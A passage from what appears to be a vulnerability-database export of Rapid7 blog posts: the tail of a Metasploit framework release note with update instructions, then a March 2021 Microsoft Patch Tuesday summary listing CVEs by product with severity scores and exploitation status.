sysinfo command is run, and whenever stdapi is loaded manually. This should also fix a minor bug where if you run an exploit on an existing session, the session information never gets updated (e.g the username from User -> SYSTEM). Now it's refreshed when you run `meterpreter > sysinfo`.\n\n * [#15629](<https://github.com/rapid7/metasploit-framework/pull/15629>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Fixes a regression issue where msfconsole crashed on startup when running on a Windows environments\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.2...6.1.3](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-08-26T11%3A21%3A14-05%3A00..2021-09-02T10%3A13%3A16-05%3A00%22>)\n * [Full diff 6.1.2...6.1.3](<https://github.com/rapid7/metasploit-framework/compare/6.1.2...6.1.3>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T16:30:26", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300", "CVE-2021-33544", "CVE-2021-33548", "CVE-2021-33550", "CVE-2021-33554", "CVE-2021-3490"], "modified": "2021-09-03T16:30:26", "id": "RAPID7BLOG:87258C1DADE2252F01C88F01B6B88F78", "href": "https://blog.rapid7.com/2021/09/03/metasploit-wrap-up-128/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-13T12:49:58", "description": "![Patch Tuesday - March 2021](https://blog.rapid7.com/content/images/2021/03/patches-2.jpg)\n\nAnother Patch Tuesday ([2021-Mar](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>)) is upon us and with this month comes a whopping 122 CVEs. As usual Windows tops the list of the most patched product. However, this month it\u2019s browser vulnerabilities taking the second place, outnumbering Office vulnerabilities 3:1! Lastly, the Exchange Server vulnerabilities this month are not to be ignored as more than half of them have been seen exploited in the wild.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 59 \nBrowser | 35 \nESU | 24 \nMicrosoft Office | 11 \nExchange Server | 7 \nDeveloper Tools | 6 \nAzure | 3 \nSQL Server | 1 \n \n## [Exchange Server Vulnerabilities](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>)\n\nEarlier this month Microsoft [released out of band updates for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). These critical updates fixed a number of publicly exploited vulnerabilities, but not before attackers were able to compromise over 30,000 internet facing instances. \n\nYesterday, Microsoft issued an [additional set of patches](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) for older, unsupported versions of Exchange Server. This allows customers who have not been able to update to the most recent version of Exchange the ability to defend against these widespread exploit attempts.\n\nIf you administer an Exchange Server,** stop reading this blog and go patch these systems!** For more information [please see our blog post on the topic](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>).\n\n## Patch those Windows systems!\n\nAlmost half of the newly announced vulnerabilities this month affect components of Windows itself. Some major highlights include:\n\n * Multiple high severity RCE vulnerabilities in Windows DNS Server \n([CVE-2021-26877](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26877>), [CVE-2021-26893](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26893>), [CVE-2021-26894](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26894>), [CVE-2021-26895](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26895>), and [CVE-2021-26897](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26897>))\n * Remote Code Execution in Hyper-V ([CVE-2021-26867](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26867>)) enabling virtual machine escape (CVSSv3 9.9)\n\n## Browser Vulnerabilities\n\nSince going end-of-life in November 2020, we haven't seen any Internet Explorer patches from Microsoft. However, this month Microsoft has made two new updates available: [CVE-2021-27085](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27085>) and [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26411>). CVE-2021-26411 has been exploited in the wild, so don't delay applying patches if IE is still in your environment.\n\nThe majority of the browser vulnerabilities announced this month affect Microsoft Edge on Chromium. These patches are courtesy of vulnerabilities being fixed upstream in the Chromium project.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27075>) | Azure Virtual Machine Information Disclosure Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-27080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27080>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 9.3 | Yes \n[CVE-2021-27074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27074>) | Azure Sphere Unsigned Code Execution Vulnerability | No | No | 6.2 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27085>) | Internet Explorer Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-21190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21190>) | Chromium CVE-2021-21190 : Uninitialized Use in PDFium | No | No | N/A | Yes \n[CVE-2021-21189](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21189>) | Chromium CVE-2021-21189: Insufficient policy enforcement in payments | No | No | N/A | Yes \n[CVE-2021-21188](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21188>) | Chromium CVE-2021-21188: Use after free in Blink | No | No | N/A | Yes \n[CVE-2021-21187](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21187>) | Chromium CVE-2021-21187: Insufficient data validation in URL formatting | No | No | N/A | Yes \n[CVE-2021-21186](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21186>) | Chromium CVE-2021-21186: Insufficient policy enforcement in QR scanning | No | No | N/A | Yes \n[CVE-2021-21185](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21185>) | Chromium CVE-2021-21185: Insufficient policy enforcement in extensions | No | No | N/A | Yes \n[CVE-2021-21184](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21184>) | Chromium CVE-2021-21184: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21183](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21183>) | Chromium CVE-2021-21183: Inappropriate implementation in performance APIs | No | No | N/A | Yes \n[CVE-2021-21182](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21182>) | Chromium CVE-2021-21182: Insufficient policy enforcement in navigations | No | No | N/A | Yes \n[CVE-2021-21181](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21181>) | Chromium CVE-2021-21181: Side-channel information leakage in autofill | No | No | N/A | Yes \n[CVE-2021-21180](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21180>) | Chromium CVE-2021-21180: Use after free in tab search | No | No | N/A | Yes \n[CVE-2021-21179](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21179>) | Chromium CVE-2021-21179: Use after free in Network Internals | No | No | N/A | Yes \n[CVE-2021-21178](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21178>) | Chromium CVE-2021-21178 : Inappropriate implementation in Compositing | No | No | N/A | Yes \n[CVE-2021-21177](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21177>) | Chromium CVE-2021-21177: Insufficient policy enforcement in Autofill | No | No | N/A | Yes \n[CVE-2021-21176](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21176>) | Chromium CVE-2021-21176: Inappropriate implementation in full screen mode | No | No | N/A | Yes \n[CVE-2021-21175](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21175>) | Chromium CVE-2021-21175: Inappropriate implementation in Site isolation | No | No | N/A | Yes \n[CVE-2021-21174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21174>) | Chromium CVE-2021-21174: Inappropriate implementation in Referrer | No | No | N/A | Yes \n[CVE-2021-21173](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21173>) | Chromium CVE-2021-21173: Side-channel information leakage in Network Internals | No | No | N/A | Yes \n[CVE-2021-21172](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21172>) | Chromium CVE-2021-21172: Insufficient policy enforcement in File System API | No | No | N/A | Yes \n[CVE-2021-21171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21171>) | Chromium CVE-2021-21171: Incorrect security UI in TabStrip and Navigation | No | No | N/A | Yes \n[CVE-2021-21170](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21170>) | Chromium CVE-2021-21170: Incorrect security UI in Loader | No | No | N/A | Yes \n[CVE-2021-21169](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21169>) | Chromium CVE-2021-21169: Out of bounds memory access in V8 | No | No | N/A | Yes \n[CVE-2021-21168](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21168>) | Chromium CVE-2021-21168: Insufficient policy enforcement in appcache | No | No | N/A | Yes \n[CVE-2021-21167](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21167>) | Chromium CVE-2021-21167: Use after free in bookmarks | No | No | N/A | Yes \n[CVE-2021-21166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21166>) | Chromium CVE-2021-21166: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21165](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21165>) | Chromium CVE-2021-21165: Object lifecycle issue in audio | No | No | N/A | Yes \n[CVE-2021-21164](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21164>) | Chromium CVE-2021-21164: Insufficient data validation in Chrome for iOS | No | No | N/A | Yes \n[CVE-2021-21163](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21163>) | Chromium CVE-2021-21163: Insufficient data validation in Reader Mode | No | No | N/A | Yes \n[CVE-2021-21162](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21162>) | Chromium CVE-2021-21162: Use after free in WebRTC | No | No | N/A | Yes \n[CVE-2021-21161](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21161>) | Chromium CVE-2021-21161: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2021-21160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21160>) | Chromium CVE-2021-21160: Heap buffer overflow in WebAudio | No | No | N/A | Yes \n[CVE-2021-21159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21159>) | Chromium CVE-2021-21159: Heap buffer overflow in TabStrip | No | No | N/A | Yes \n[CVE-2020-27844](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-27844>) | Chromium CVE-2020-27844: Heap buffer overflow in OpenJPEG | No | No | N/A | Yes \n \n## Browser ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>) | Internet Explorer Memory Corruption Vulnerability | Yes | Yes | 8.8 | Yes \n \n## Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27060>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27084>) | Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | No | No | N/A | No \n[CVE-2021-27081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27081>) | Visual Studio Code ESLint Extension Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27083>) | Remote Development Extension for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-27082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27082>) | Quantum Development Kit for Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-21300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21300>) | Git for Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | No \n \n## Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26412>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 9.1 | Yes \n[CVE-2021-27078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27078>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No \n[CVE-2021-26857](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-27065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n[CVE-2021-26854](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26854>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 6.6 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27055>) | Microsoft Visio Security Feature Bypass Vulnerability | No | No | 7 | Yes \n[CVE-2021-24104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24104>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | Yes \n[CVE-2021-27076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27076>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-27052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27052>) | Microsoft SharePoint Server Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-27056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27056>) | Microsoft PowerPoint Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24108>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27057>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27059>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.6 | Yes \n[CVE-2021-27058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27058>) | Microsoft Office ClickToRun Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27053>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27054>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26859](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26859>) | Microsoft Power BI Information Disclosure Vulnerability | No | No | 7.7 | Yes \n \n## Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-26900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26900>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26863>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26871>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26885](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26885>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26864](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26864>) | Windows Virtual Registry Provider Elevation of Privilege Vulnerability | No | No | 8.4 | No \n[CVE-2021-1729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1729>) | Windows Update Stack Setup Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26889>) | Windows Update Stack Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26866>) | Windows Update Service Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26870>) | Windows Projected File System Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26874>) | Windows Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26879>) | Windows NAT Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-26884](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26884>) | Windows Media Photo Codec Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26867>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 9.9 | Yes \n[CVE-2021-26868](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26868>) | Windows Graphics Component Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26892>) | Windows Extensible Firmware Interface Security Feature Bypass Vulnerability | No | No | 6.2 | No \n[CVE-2021-24090](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24090>) | Windows Error Reporting Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26865](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26865>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 8.8 | No \n[CVE-2021-26891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26891>) | Windows Container Execution Agent Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26860>) | Windows App-V Overlay Filter Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-27066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066>) | Windows Admin Center Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-27070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27070>) | Windows 10 Update Assistant Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2021-26886](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26886>) | User Profile Service Denial of Service Vulnerability | No | No | 5.5 | No \n[CVE-2021-26880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26880>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26876](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26876>) | OpenType Font Parsing Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-24089](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24089>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26902](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26902>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27061>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24110>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27047](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27047>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27048](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27048>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27049>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27050](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27050>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27051>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-27062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27062>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24095>) | DirectX Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26890>) | Application Virtualization Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n## Windows ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>) | Windows Win32k Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-26875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26875>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26873>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2021-26899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26899>) | Windows UPnP Device Host Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1640>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-26878](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26878>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26862>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 6.3 | No \n[CVE-2021-26861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26861>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-24107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24107>) | Windows Event Tracing Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26872>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26898>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26901>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26897>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26877>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26893>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26894>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26895>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-26896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26896>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-27063](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27063>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-26869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26869>) | Windows ActiveX Installer Service Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-26882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26882>) | Remote Access API Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26881](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26881>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.5 | No 